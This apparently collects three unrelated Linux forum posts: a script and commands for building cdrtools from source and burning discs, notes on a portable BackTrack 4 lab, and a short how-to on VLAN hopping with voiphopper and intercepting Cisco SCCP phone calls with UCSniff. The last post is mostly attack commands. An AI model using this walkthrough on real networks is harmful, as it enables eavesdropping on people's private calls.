In trying to figure out why cdrecord was failing on my computer, I stumbled across something. It turns out there's a massive controversy in Linux regarding the cdrtools package (this package contains such programs as mkisofs, cdrecord).

Basically there are two different parties developing a package by the same name, they're both calling it "cdrtools", and they do not get on well with each other. They started out as one group, but then they split. You can read about it here:

Cdrtools - why do Linux distributions create bad forks?

One of the cdrtools packages is way better than the other. One of them is stable, while the other is buggy. Unfortunately it is the buggy one that made it into Ubuntu's repositories.

The buggy version creates symbolic links in "/usr/bin" for files such as mkisofs and cdrecord. If you do the following:

Code:

ls -l /usr/bin/cdrecord

then you'll be able to see what the symbolic link points to. If it points to "wodim", then you've got the buggy version.

So without further a do, here's how you get the stable version of cdrtools. You're best off copy-pasting the following into a script called "get_stable_cdrtools.sh", then giving it execution permissions and running it as root as follows:

Code:

chmod +x get_stable_cdrtools.sh

sudo ./get_stable_cdrtools.sh

Here's the code for the script. (This script was written by a guy called IgnorantGuru over on the Ubuntu forums).

Code:

# install compiler tools

sudo apt-get install build-essential



# Make sure you're in the home folder

cd



# Make a working folder and change to it

mkdir cdrtools

cd cdrtools



# Download latest cdrtools from http://cdrecord.berlios.de/private/linux-dist.html

wget ftp://ftp.berlios.de/pub/cdrecord/alpha/cdrtools-beta.tar.gz



# Unpack

tar xzf cdrtools-beta.tar.gz



# CD to the directory cdrtools is in.

cd cdrtools-2.01.01



# Compile and install

sudo make

sudo make install

sudo make clean



# Files are installed to /opt/schily

# (you may want to change their ownership to root:root)

sudo chown root:root /opt/schily/bin/*



# Move the following files (some will be links) from /usr/bin to a junk folder...

sudo mkdir /opt/schily/replacedfiles

sudo mv /usr/bin/cdrecord /opt/schily/replacedfiles

sudo mv /usr/bin/genisoimage /opt/schily/replacedfiles

sudo mv /usr/bin/mkisofs /opt/schily/replacedfiles

sudo mv /usr/bin/readom /opt/schily/replacedfiles

sudo mv /usr/bin/wodim /opt/schily/replacedfiles



# Create links:

sudo ln -s /opt/schily/bin/cdrecord /usr/bin/cdrecord

sudo ln -s /opt/schily/bin/mkisofs /usr/bin/genisoimage

sudo ln -s /opt/schily/bin/mkisofs /usr/bin/mkisofs

sudo ln -s /opt/schily/bin/readcd /usr/bin/readom

sudo ln -s /opt/schily/bin/cdrecord /usr/bin/wodim

sudo ln -s /opt/schily/bin/readcd /usr/bin/readcd

sudo ln -s /opt/schily/bin/mkhybrid /usr/bin/mkhybrid

sudo ln -s /opt/schily/bin/cdda2wav /usr/bin/cdda2wav



# Remove working folder

cd ~

sudo rm -r cdrtools

After you do this, you have a fully-functional, non-buggy installation of cdrtools.

I still haven't figured out the problem of specifying the track size, and I sent the developers of cdrtools an e-mail about it, but I've a feeling they won't respond because they said they had to cut off "personal support" because they were just getting too many e-mails.

If anyone knows a solution to the "track size" problem, post it here please. I wonder if there's some way of getting mkisofs to say how big the ISO file will be. Maybe something like

Code:

mkisofs --just-tell-the-size

If so we could use this as follows:

Code:

mkisofs -fRrlJ -A Disc_Volume_Label -o - name_of_folder | sudo cdrecord -tsize=`mkisofs --just-tell-the-size -fRrlJ -A Disc_Volume_Label name_of_folder` dev=/dev/hda -

I've looked through the manual for mkisofs already though and haven't found anything yet.

After 2 days of investigating I finally got to the bottom of it :rolleyes:

mkisofs has a command line option "-print-size" that will tell you the size of the ISO it would have created.

So here's how you quickly burn a folder to disc:

Code:

mkisofs -fRrlJ -A Disc_Volume_Label Name_Of_Folder | sudo cdrecord tsize=`mkisofs -quiet -print-size -fRrlJ -A Disc_Volume_Lable Name_Of_Folder` dev=/dev/hda -

You could make a script out of it as follows:

Code:

mkisofs -fRrlJ -A $1 $1 | sudo cdrecord tsize=`mkisofs -quiet -print-size -fRrlJ -A $1 $1` dev=/dev/hda -

And then run the script as:

Code:

burnfolder.sh Name_Of_Folder

Now if you're lucky, this command won't just freeze your command line indefinitely and sit there doing nothing... like it does on my computer... f*** sake. It turns out that since I switched from the buggy cdrtools to the stable cdrtools, it won't burn anything to disc for me anymore even if I try to burn a simple ISO file to disc. Even if I do "cdrecord -scanbus", it just freezes and does nothing :mad: Another thing to troubleshoot.

Building a portable lab

mno@8 — Thu, 22 Oct 2009 11:10:29 GMT

The goal: installation of BT4 pre-release on an external USB disk to create a portable lab environment with vmware.
The first step was to install BT4 on a USB disk. I booted on a DVD than used ubiquity to install BT on the HD. To prevent ubiquity to modify my MBR, I run this inside a vmware without disk!
Than I updated the kernel, installed vmware player and the nvidia drivers. I have to confess that despite all information on the forum I could not install vmware with the latest kernel. I had to roll back and everything works like a charm.
Another issue I found: I put all my virtual machines on a ntfs partition on my external disk. Bad idea: when having large files the ntfs process is eating all CPU. I put it on an ext3 and kept only a few gb for data exchange with other OSes.

I also found that when using KDE to delete files they are transfered into the trash but BT4 does not offer an interface to empty the trash. 2 solutions: you can modify Konqueror using the settings menu to delete instead or moving to trash or you can add a "link to Location(URL)" in the desktop and make it pointing to trash:/

A very convenient feature is to be able to mount the different partitions of the USB disk automatically in fstab using UUID. That works great. You can find the UUID of your drive running "blkid".

Now I can run my lab environment whatever the hardware I have.

Hope this help someone...

BT4 + EEE 701 + VLAN Hopping + UCSniff 3.0

ecks90 — Thu, 22 Oct 2009 07:14:18 GMT

Hey guys,

First time posting here.

UCSniff 3.0 was released today, ahead of schedule. I had been hanging out for this for the --garpdb option to disable GARP when sniffing Cisco SCCP packets.

I have written up a small how-to using voiphopper + ucsniff on my EEE 701. I have written this on my blog (nothing fancy), hope its ok to link here.

x90 Blog

Thanks.

//edit full howto

Create persistent BT4 on USB
Followed the directions outlined here:

Backtrack 4 – USB/Persistent Changes/Nessus | Infosec Ramblings

VLAN Support + VLAN Hopping
Firstly modprobe to enable VLAN tagging in the environment

Code:

modprobe 8021q

Connect to a cisco switchport with a similar switch config

Code:

switchport mode access

switchport access vlan 10

switchport voice vlan 20

Try VLAN hopping with voiphopper

Code:

voiphopper -i eth0 -c 0

Download and compile UCSniff 3.0
Download UCSniff here:

UCSniff IP Video Sniffer

Compiling

Code:

tar zxvf ucsniff-3.01.tar.gz

cd ucsniff-3.01

./configure

make

make install

MiTM SCCP
To record all SCCP conversations on the voice VLAN

Code:

ucsniff -i eth0.20 --garpdb // //

Or to target a particular IP phone, without enumerating the targets on the voice VLAN first

Code:

ucsniff -i eth0.20 --garpdb /XXXX.XXXX.XXXX.XXXX/ //

Finally play back the file from the commandline

Code:

play filename.mp3